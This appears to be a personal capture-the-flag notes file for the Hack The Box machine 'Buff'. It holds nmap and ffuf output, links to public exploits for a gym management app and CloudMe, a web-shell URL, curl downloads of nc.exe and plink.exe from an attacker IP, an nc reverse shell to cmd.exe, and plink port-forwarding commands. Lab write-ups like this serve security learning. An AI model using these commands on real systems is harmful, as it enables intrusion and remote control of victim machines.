Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 14:14 EDT
Nmap scan report for buff.htb (10.10.10.198)
Host is up (0.058s latency).

PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
3306/tcp filtered mysql
8080/tcp open     http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds

################################################################################
FOOTHOLD
################################################################################

X - New XAMPP security concept:
  Access to the requested object is only available from the local network.
  This setting can be configured in the file "httpd-xampp.conf".

X - Warning: mysqli::__construct(): (HY000/1049): Unknown database 'secure_login' in C:\xampp\htdocs\gym\ex\include\db_connect.php on line 3
X - had to guess 8080:
  -ffuf :8080/FUZZ
    home.php     
    index.php    
    register.php 
    contact.php  
    feedback.php 
    .            
    upload.php   
    about.php    
    edit.php     
    up.php       
    Register.php 
    Index.php    
    packages.php 
    Contact.php  
    4.jpg        
    Home.php     
    index.Php    
  X - Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
    X - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984

O - gym management software 1.0
  - https://www.exploit-db.com/exploits/48506
    - python python sploit0.py 'http://buff.htb:8080/
      -curl http://10.10.14.16/plink.exe
      -curl http://10.10.14.16/nc.exe
    - buff.htb:8080/upload/kun.php?telepathy=<CMD>
    - http://buff.htb:8080/upload/kun.php?telepathy=type%20..\..\..\..\Users\shaun\Desktop\user.txt
    - http://buff.htb:8080/upload/kun.php?telepathy=nc -nv 10.10.14.16 1337 -e cmd.exe

################################################################################
ROOT
################################################################################
O - tasklist & netstat -ano -p tcp 
  - TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2960
  - Same pid running cloudme.exe
  - exploit https://www.exploit-db.com/exploits/48389
    plink attackingMachine -R 4000:127.0.0.1:3389
      - The syntax is similar to SSH. Using the -R option tells Plink to 
        connect to the attacking machine and bind a channel on port 4000 (I 
        arbitrarily selected port 4000 — you can select any port). The next 
        portion in between the colons defines what service will be served to 
        port 4000 on the attacking machine. In this case, the victim machine's 
        port 3389. Once this command is entered, I will log in with my 
        credentials to my attacking machine. Now, my attacking machine has 
        access to the remote desktop service on the victim machine on my 
        localhost port 4000.
          - 10.10.14.16 -R 1339:127.0.0.1:8888
          - ATTACKER    -R APORT:VICTIM:VPORT
            X - plink.exe 10.10.14.16 -R 1339:127.0.0.1:8888
            X - plink.exe 10.10.14.16 -P 1400 -raw -R 4444:127.0.0.1:8888
            X - plink.exe 10.10.14.16 -ssh -R 22:127.0.0.1:8888
            X - plink.exe 10.10.14.16 -P 4444 -raw -D 127.0.0.1:8888
            O - plink.exe -v -x -a -T -C -noagent -ssh -pw kali -R 8888:127.0.0.1:8888 kali@10.10.14.16
            O - plink.exe -v -x -a -T -C -noagent -ssh -pw kali -R 8881:127.0.0.1:8888 kali@10.10.14.16
              - sudo systemctl start ssh
              - Remote port forwarding from 8881 enabled
                - try other ports sometimes... sometimes ports will refuse


